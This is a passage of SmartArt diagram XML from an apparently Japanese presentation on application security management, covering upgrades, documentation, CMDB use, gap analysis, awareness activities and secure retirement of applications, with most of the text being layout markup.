              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>、ミドルウェア、ライブラリのバージョンアップに関する変更の計画と管理を実施する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AFBCCE3-05C5-9047-A01E-1FF02341894D}" type="parTrans" cxnId="{50B0880D-B237-8248-88C7-63B4EE647D7A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0DE98303-46FC-F74B-BD57-4C7AB84C10DD}" type="sibTrans" cxnId="{50B0880D-B237-8248-88C7-63B4EE647D7A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{01C5D3F7-170A-4142-8922-693E50E4ECB9}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>変更管理データベースや運用手順書、プロジェクトに関する文書を含む全ての文書を更新する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A172973-A23E-E048-A68F-376B68A5C837}" type="parTrans" cxnId="{46799EAD-C710-0B4B-8124-EBBF4CFD0A55}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E904DB73-94C8-0E4B-B814-9C044B55792B}" type="sibTrans" cxnId="{46799EAD-C710-0B4B-8124-EBBF4CFD0A55}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{19252D39-5B8B-2B42-9A38-9179CB6E162B}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>未使用のアカウント、役割、権限の削除などを実施し、アプリケーションを安全に廃棄する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0DFBF4F7-5F5C-5D40-AAD0-77A7C1191D5A}" type="parTrans" cxnId="{CD2217D1-6A70-134E-B35C-6F3CFB2307DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64048F7B-BA08-9C41-AAE1-FAF1166572C4}" type="sibTrans" cxnId="{CD2217D1-6A70-134E-B35C-6F3CFB2307DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DEC5CC4A-FC3F-F24C-9101-EEFF66CB2E42}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>構成管理データベースにおいてアプリケーションのステータスを廃棄にする。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AA2C8DD-0BFC-2140-947F-A95E4CF7D629}" type="parTrans" cxnId="{78C49474-234C-E442-8A90-C62A05882CC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{843323BC-BC96-0C40-AC0C-A4B3BA1238E1}" type="sibTrans" cxnId="{78C49474-234C-E442-8A90-C62A05882CC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>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6" custScaleX="123722" custScaleY="9091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pt>
    <dgm:pt modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="6" custScaleX="123722" custScaleY="107152">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>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pt>
  </dgm:ptLst>
  <dgm:cxnLst>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50B0880D-B237-8248-88C7-63B4EE647D7A}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{8724D14D-B668-9F4F-812A-290F764EE6C1}" srcOrd="2" destOrd="0" parTransId="{7AFBCCE3-05C5-9047-A01E-1FF02341894D}" sibTransId="{0DE98303-46FC-F74B-BD57-4C7AB84C10DD}"/>
    <dgm:cxn modelId="{663E6510-93C8-514B-930F-56CB4EC90787}" type="presOf" srcId="{F4929216-EC1A-9F45-93D1-71864BC07AA8}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A1D90812-9879-CE42-8D12-8ED23332201D}" type="presOf" srcId="{D733A7B8-564F-1A47-97EB-871D93ACEC21}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="3"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A4BCFA15-B570-475E-8076-E0DF9219BD56}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" srcOrd="4" destOrd="0" parTransId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" sibTransId="{3AEE799B-7F35-4AE2-93E2-335733E35922}"/>
    <dgm:cxn modelId="{71F33017-2226-E14D-88F3-316D8918AE14}" type="presOf" srcId="{8724D14D-B668-9F4F-812A-290F764EE6C1}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6737DB18-8A7E-5743-9E9B-7A10AAEE99EA}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{D733A7B8-564F-1A47-97EB-871D93ACEC21}" srcOrd="3" destOrd="0" parTransId="{B2CA0D12-A4D9-F343-B30B-A8AF153B398F}" sibTransId="{9D7EC72F-0F4D-0343-9037-A6165C752ECF}"/>
    <dgm:cxn modelId="{6DE71C1C-6FF0-2F44-9685-E37885B0B41F}" type="presOf" srcId="{D2FD8FEB-6768-1342-999F-979450856FFB}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0B081F23-A169-D240-8BF9-D6E14BD31FAA}" type="presOf" srcId="{A69E44DB-6CF3-334E-9A1A-6F1467B4A6D7}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4D2FFA2C-830C-DA4B-9401-FBA2BD95BC3E}" type="presOf" srcId="{19252D39-5B8B-2B42-9A38-9179CB6E162B}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3227372D-E906-6F4E-8E96-E9FA65313C8A}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{138F093A-810D-ED4D-AB36-569643B739DA}" srcOrd="2" destOrd="0" parTransId="{D1F6978F-D2EF-4B46-B75A-45BA33621292}" sibTransId="{D0F4DC8B-0FAC-9449-A0AF-EFB661BC3BF3}"/>
    <dgm:cxn modelId="{D9FA832D-F87A-CC48-BF9D-653E8F4764BA}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{BDBA71B7-7A44-A942-89D9-2255168FF8BF}" srcOrd="3" destOrd="0" parTransId="{D43DB619-CCAA-0948-97BA-6C66133D9602}" sibTransId="{FBBB261A-D567-BE4D-A68B-24D57CC2822E}"/>
    <dgm:cxn modelId="{51683A2F-F3B4-F54E-9003-14C20EF93F40}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{4140C0AF-BDDF-E842-B8DD-5AF6FC24A1D0}" srcOrd="1" destOrd="0" parTransId="{D9146353-0639-104A-B930-D9CFF93C5F47}" sibTransId="{73E70927-0144-D34B-A981-B32747975D24}"/>
    <dgm:cxn modelId="{73D7DA33-1AC9-154A-9321-AECB1A180043}" type="presOf" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" srcOrd="0" destOrd="0"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19DCF33E-2792-0541-B55B-D827B2D3B0E4}" type="presOf" srcId="{C8885E6F-7407-C64B-B9DB-9FCA804A6604}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{051F9242-E1E2-2444-B3CE-725EAD7E4065}" type="presOf" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{41001443-19D5-F640-93A3-FABF1912EF96}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{F70C5CA4-4F9E-1B40-A4C5-2194A982C528}" srcOrd="1" destOrd="0" parTransId="{7DD49A25-8B5C-C24A-8252-02B563B0C455}" sibTransId="{0AA7A255-0C58-6347-9E7D-515C4676838C}"/>
    <dgm:cxn modelId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}" srcOrd="0" destOrd="0" parTransId="{09E61F83-0B7F-450A-8267-AC41E419DB2F}" sibTransId="{2FA6E4AA-CA8D-4524-8451-A2B7B829BDA4}"/>
    <dgm:cxn modelId="{A560494C-16CB-1C48-A453-3837AD145956}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{F4929216-EC1A-9F45-93D1-71864BC07AA8}" srcOrd="1" destOrd="0" parTransId="{A199C1B9-A313-B142-AF7F-A478D519A3C8}" sibTransId="{6A35F9B4-04E7-084F-842A-62A1ECBDD1CA}"/>
    <dgm:cxn modelId="{A40ED050-BDA1-BA44-9165-1409C092BD58}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5AF1BC55-466A-8842-B937-F9C14D5A397E}" type="presOf" srcId="{D16F69F3-EE28-974D-8B99-CB2A1E2C39E9}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" srcOrd="3" destOrd="0" parTransId="{DB269FA1-9301-43AF-AA70-A9D7CC0462DC}" sibTransId="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}"/>
    <dgm:cxn modelId="{D25B1A61-2C17-D045-8BA8-C03D84862479}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3E9C0068-185E-904D-BE78-36050DEEF51C}" type="presOf" srcId="{BDBA71B7-7A44-A942-89D9-2255168FF8BF}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{18A47F6B-B710-4846-A1B5-A56DEDB5ED69}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{ECE7FE92-31BF-724C-A3FF-8657F774ACBF}" srcOrd="5" destOrd="0" parTransId="{5F9AC828-FEE9-A04B-9539-DF07267AAF8C}" sibTransId="{5FA4F62B-8C6F-AB4F-8CEB-90ED913764AC}"/>
    <dgm:cxn modelId="{BF55056D-FA90-AB44-9E77-172DB6E9FFE8}" type="presOf" srcId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E0E43773-C278-C549-A8E9-B122ADF89BC7}" type="presOf" srcId="{138F093A-810D-ED4D-AB36-569643B739DA}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{78C49474-234C-E442-8A90-C62A05882CC7}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{DEC5CC4A-FC3F-F24C-9101-EEFF66CB2E42}" srcOrd="2" destOrd="0" parTransId="{3AA2C8DD-0BFC-2140-947F-A95E4CF7D629}" sibTransId="{843323BC-BC96-0C40-AC0C-A4B3BA1238E1}"/>
    <dgm:cxn modelId="{56CC6476-007B-7D44-A24F-434CD6DDC2F6}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{D2FD8FEB-6768-1342-999F-979450856FFB}" srcOrd="4" destOrd="0" parTransId="{07E11D50-C476-B749-ACDA-EFF21461F162}" sibTransId="{8FC75C9C-5424-D645-8208-98D54C7794D8}"/>
    <dgm:cxn modelId="{CA927177-4EE8-A94C-8736-95D7195B3DF5}" type="presOf" srcId="{ECE7FE92-31BF-724C-A3FF-8657F774ACBF}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FCDE4B7B-DE60-6A4E-B470-639104128D04}" type="presOf" srcId="{F70C5CA4-4F9E-1B40-A4C5-2194A982C528}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{48BAF57B-63E3-2742-8624-1987E74A58FD}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{CC27990C-9BD9-184B-A25A-C04D5EDB5AEC}" srcOrd="2" destOrd="0" parTransId="{3514C19B-208C-7A4B-ACB2-521D97E1B24E}" sibTransId="{AC5DD40A-EA5F-B347-8C3B-94A00E39DEA0}"/>
    <dgm:cxn modelId="{23741E7C-0822-224E-8FBE-DAB4B56A41C3}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{C8885E6F-7407-C64B-B9DB-9FCA804A6604}" srcOrd="2" destOrd="0" parTransId="{C3F633ED-F875-3B49-9611-1DAEFC39CCB5}" sibTransId="{52CC0F03-1E45-3D44-90C8-7E4BC7F84C5D}"/>
    <dgm:cxn modelId="{B663EA81-9240-5F43-A148-92ACDFE7CC44}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0957F586-5356-EF45-966C-128E7F7AB956}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{21CCE488-FA7F-384A-A5E5-F7531C2F7A2D}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{33A9D48C-20A3-0249-B6AD-09BA6231F8B0}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{D16F69F3-EE28-974D-8B99-CB2A1E2C39E9}" srcOrd="3" destOrd="0" parTransId="{65F16855-44ED-BD4A-A4A6-46DACBBE7C1F}" sibTransId="{0796F0DD-F2C0-914A-9420-BB1B76037FDA}"/>
    <dgm:cxn modelId="{CB898B91-3468-4547-9027-5FBA7CBEDB13}" type="presOf" srcId="{CC27990C-9BD9-184B-A25A-C04D5EDB5AEC}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{809E6B92-D515-B84A-8BC2-B1F469428344}" type="presOf" srcId="{4140C0AF-BDDF-E842-B8DD-5AF6FC24A1D0}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1"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552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{E670BDA0-F5C0-4941-B2E5-D3107FD0D7C3}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{5C009CBD-2B17-1147-A961-BDEFF70BABFB}" srcOrd="2" destOrd="0" parTransId="{765D934A-CD95-1045-BDB4-FF8B9D684567}" sibTransId="{64F6CCFA-890C-694B-B00A-450AB409F105}"/>
    <dgm:cxn modelId="{5368E3A4-753E-674F-8CE6-22C51467BAEB}" type="presOf" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E2BFD8A9-22B4-1240-BF50-4B01A6E7275B}" type="presOf" srcId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{46799EAD-C710-0B4B-8124-EBBF4CFD0A55}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{01C5D3F7-170A-4142-8922-693E50E4ECB9}" srcOrd="3" destOrd="0" parTransId="{5A172973-A23E-E048-A68F-376B68A5C837}" sibTransId="{E904DB73-94C8-0E4B-B814-9C044B55792B}"/>
    <dgm:cxn modelId="{5151C2B0-44C8-E44C-BD5C-05F56E667B40}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{A69E44DB-6CF3-334E-9A1A-6F1467B4A6D7}" srcOrd="1" destOrd="0" parTransId="{BB933985-0A1C-DC41-93B4-9EDBC59874B1}" sibTransId="{4DE332AE-6226-FB4A-A27B-A6629BF58831}"/>
    <dgm:cxn modelId="{0EBC86B2-1B2E-D743-B1FC-2B9051176604}" type="presOf" srcId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D86B37B8-2E2E-6848-9670-C7E2CBF44EEC}" type="presOf" srcId="{5C009CBD-2B17-1147-A961-BDEFF70BABFB}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8E8AC2BF-68D7-E749-9587-9ED1ABEEB494}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{D4D15543-9061-424B-A848-0C92495995FD}" srcOrd="1" destOrd="0" parTransId="{D7FD6253-75BA-8F4E-81A0-00394F202A8E}" sibTransId="{72C434AB-64A1-A442-99E9-FBB1788602E1}"/>
    <dgm:cxn modelId="{A06C3FC4-2C32-EA41-8606-830FE1E40CB9}" type="presOf" srcId="{DEC5CC4A-FC3F-F24C-9101-EEFF66CB2E42}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1663DDCE-3895-8942-B51D-D53C29E7A255}" type="presOf" srcId="{01C5D3F7-170A-4142-8922-693E50E4ECB9}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CD2217D1-6A70-134E-B35C-6F3CFB2307DA}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{19252D39-5B8B-2B42-9A38-9179CB6E162B}" srcOrd="1" destOrd="0" parTransId="{0DFBF4F7-5F5C-5D40-AAD0-77A7C1191D5A}" sibTransId="{64048F7B-BA08-9C41-AAE1-FAF1166572C4}"/>
    <dgm:cxn modelId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" srcOrd="2" destOrd="0" parTransId="{3E44837D-D7DC-4906-821E-A6950790F46F}" sibTransId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}"/>
    <dgm:cxn modelId="{BDA0A2DB-50A7-9E41-8394-C10237C43F67}" type="presOf" srcId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0"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DB4CA1F8-15B9-3A4B-B718-7A58463FABD6}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{91ED3BFA-9799-E74A-A325-236DB8BCC08F}" type="presOf" srcId="{D4D15543-9061-424B-A848-0C92495995FD}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1"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48012" y="-2161807"/>
          <a:ext cx="113260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全てのアプリケーションと関連するデータ資産を文書化します。より大きな組織においては、文書化を実現するために構成管理データベース（</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>CMDB</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）を実装することを検討すべきです。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hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>アプリケーションセキュリティのプログラム</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を構築し、適用します。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自らの組織と同様の組織の間の</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hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>ギャップ分析</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を実施して、重要な要改善分野と実行プランを定義します。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経営層の許可を取り付け、</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hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>アプリケーションセキュリティの意識向上活動</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を情報システム部門全体で実施します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
